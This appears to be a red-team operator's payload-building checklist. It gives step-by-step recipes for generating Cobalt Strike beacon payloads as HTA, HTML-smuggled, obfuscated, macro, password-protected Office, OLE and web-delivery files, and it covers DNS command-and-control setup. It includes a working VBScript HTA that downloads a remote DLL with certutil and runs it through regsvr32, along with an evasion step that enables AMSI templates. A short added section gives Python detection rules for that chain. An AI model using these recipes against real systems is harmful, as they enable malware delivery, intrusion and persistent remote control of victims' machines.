create_pl.txt
Here are the 15 or so payloads that need to be generated for RPTs. The only method that’s not noted is that of the OLE document (#10, #11). If you have a working method, or any other payload types, please add them to the list.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
04-https-psh.hta
Cobalt Strike beacon payload, generated by:
Attacks -> Packages -> HTML Application -> Listener: https Method: Powershell -> Generate
05-https-psh-morph.hta
Cobalt Strike evil.hta generated in #1, combined with MorphHTA:
In the MorphHTA directory, run the following: python morph-hta.py --in evil.hta --maxstrlen 10 --maxvarlen 10 --out 05-https-psh-morph.hta --mode mshta
<Ensure overall file size is over 240,000>
06-https-sharp.html
- Cobalt Strike raw beacon payload, generated by:
- Attacks -> Payload Generator -> Listener: https Output: raw (check x64 payload box) -> Generate
- Move payload.bin into the SharpShooter directory, then run:
python SharpShooter.py --stageless --dotnetver 2 --payload hta --rawscfile payload.bin --output 06-https-sharp --smuggle
- Host the .hta on Cobalt Strike (not the .html); the output link will still be named .html
07-https-sharp-asmi.html
- Cobalt Strike raw beacon payload, generated by:
- Attacks -> Payload Generator -> Listener: https Output: raw (check x64 payload box) -> Generate
- Move payload.bin into the SharpShooter directory, then run:
./SharpShooter.py --stageless --dotnetver 2 --payload hta --rawscfile payload.bin --output 07-https-sharp-asmi --smuggle --template mcafee --amsi amsienable
08-https-exe.hta
Cobalt Strike beacon executable HTA payload, generated by:
Attacks -> Packages -> HTML Application -> Listener: https, Method: Executable -> Generate
09-https-vba.hta
Cobalt Strike beacon Visual Basic HTA payload, generated by:
Attacks -> Packages -> HTML Application -> Listener: https, Method: VBA -> Generate
10-https-cactus.hta
- In Cobalt Strike, go to: Cobalt Strike -> Script Manager -> Load (at the bottom of the new window that opens) -> Navigate to where the CACTUSTORCH.cna file is, hit Open.
- To generate the payload: Attacks -> Host CACTUSTORCH Payload -> URI Path: 10-http-cactus.hta, Local Host: <dns FQDN>, Local Port: 80 (does not load on 443!), Listener: https, (check Use Stageless Payload), Binary: rundll32.exe, Type: HTA -> Launch
11-https-tiki.hta
Windows Executable > raw bin file > beacon.bin (don't check the 64-bit payload box)
cat beacon.bin | base64 -w 0 | xclip -selection clipboard    # xclip needs to be installed
12-https.exe
Cobalt Strike beacon executable, generated by:
Attacks -> Packages -> Windows Executable -> Listener: https, Output: Windows EXE, (check Use x64 payload) -> Generate
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------
8 - https-macro.docm
Cobalt Strike Macro beacon payload, generated by:
Attacks -> Packages -> MS Office Macro -> Listener https -> Generate
Follow the steps provided to enter the CS macro into a Word document
9 - https-macro-pw.docm
After completing the document in the steps above, select:
File -> Protect Document -> Encrypt with Password
10 - https-ole.docx
Create a new Word doc > Insert > Object > select Package (bottom) > check Display as Icon > Change Icon > browse to the icon we need > change Caption if needed
-> embed the payload (either .hta or .exe) in the object
11 - https-ole-pw.docx
13 - demi-https-OLA.html
Cobalt Strike Powershell command must first be generated (powershell -encodedcommand): Attacks -> Packages -> Payload Generator -> Listener: https, Output: Powershell Command (check use x64 payload) -> This creates a payload.txt file
python demiguise.py -k <any plaintext key> -c "paste in the PowerShell command created in the payload.txt file above" -p Outlook.Application -o 13-https-demi.hta
14 - https-certutil-exe-disk.hta
Create a Cobalt Strike .dll payload, generated by:
Attacks -> Packages -> Windows Executable -> Listener: https, Output: Windows DLL (64-bit) (check Use x64 payload) -> Generate (Make sure the name of the file matches that in the script below!) Name example here: 16-https-stageless.dll
Create a file called 14-https-certutil-exe-disk.hta
Paste the following into it:
<script LANGUAGE="VBScript">
Set cmd = CreateObject("WScript.Shell")
visible = true
' cmd.exe /c "cd c:\Windows\Temp && certutil.exe -urlcache -split -f https://<URL where stageless .dll file is hosted> 16.dll && regsvr32 /u 16.dll
'Generates artifact on disk: c:\Windows\Temp\16.dll
cmd.run "cmd.exe /c ""cd c:\Windows\Temp && certutil.exe -urlcache -split -f https://<URL where stageless .dll file is hosted> 16.dll && regsvr32 /u 16.dll""", visible
window.close()
</script>
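On the defensive side, the HTA above leaves a distinctive process trail on the endpoint: a script host (mshta.exe) spawning cmd.exe, certutil.exe fetching with -urlcache, then regsvr32 loading the dropped DLL from C:\Windows\Temp. The detection below is an added example, not part of the original file; it runs three checks over constructed process-creation events loosely modelled on Sysmon Event ID 1, and the field names, PIDs and sample command lines are assumptions.

```python
import re

# Constructed process-creation events loosely modelled on Sysmon Event ID 1
# (ProcessId, ParentProcessId, Image, CommandLine). Not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 120, "image": "mshta.exe",
     "cmd": r"mshta.exe C:\Users\u\Downloads\14-https-certutil-exe-disk.hta"},
    {"pid": 410, "ppid": 400, "image": "cmd.exe",
     "cmd": r'cmd.exe /c "cd c:\Windows\Temp && certutil.exe -urlcache -split -f '
            r'https://example.invalid/16.dll 16.dll && regsvr32 /u 16.dll"'},
    {"pid": 420, "ppid": 410, "image": "certutil.exe",
     "cmd": r"certutil.exe -urlcache -split -f https://example.invalid/16.dll 16.dll"},
    {"pid": 430, "ppid": 410, "image": "regsvr32.exe", "cmd": r"regsvr32 /u 16.dll"},
    # Benign control: an admin hashing a file, no download, no script-host ancestor.
    {"pid": 500, "ppid": 120, "image": "certutil.exe",
     "cmd": r"certutil.exe -hashfile C:\Windows\Temp\16.dll SHA256"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
LOLBINS = {"certutil.exe", "regsvr32.exe"}
CERTUTIL_FETCH = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\s-f\s", re.I)
REGSVR32 = re.compile(r"\bregsvr32(\.exe)?\b", re.I)


def has_script_host_ancestor(event, by_pid):
    """Walk the parent chain; True if any ancestor is mshta/wscript/cscript."""
    seen, cur = set(), by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        if cur["image"].lower() in SCRIPT_HOSTS:
            return True
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])
    return False


def detect(events):
    """Return (pid, rule) findings for the certutil-download-then-regsvr32 pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img = e["image"].lower()
        if img == "certutil.exe" and CERTUTIL_FETCH.search(e["cmd"]):
            findings.append((e["pid"], "certutil_urlcache_download"))
        if img == "cmd.exe" and CERTUTIL_FETCH.search(e["cmd"]) and REGSVR32.search(e["cmd"]):
            findings.append((e["pid"], "cmd_download_then_regsvr32"))
        if img in LOLBINS and has_script_host_ancestor(e, by_pid):
            findings.append((e["pid"], "lolbin_under_script_host"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The ancestry walk is what separates the chain from the benign certutil -hashfile event, which matches none of the rules.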
7 - https-psh-swd.txt
Cobalt Strike Powershell Scripted Web Delivery command, generated by:
Attacks -> Scripted Web Delivery -> URI Path: 07-https-psh-swd, Local Host: <dns FQDN>, Local Port: 443, Listener: https, Type: Powershell, (check Enable SSL box) -> Launch
(Copy and paste this script where needed)
----------------------------------------
Set up the DNS in Cobalt Strike
- From Namecheap, add new record > A record > host (dns), value (ip)
- Add new record > NS record > host (ns1), value (dns.FQDN.)
- On Cobalt Strike, create listener > name (DNS), Payload (Beacon DNS) >> DNS_Hosts (ns1.FQDN), DNS_Host (Stager) (ns1.FQDN), DNS port (Bind) 53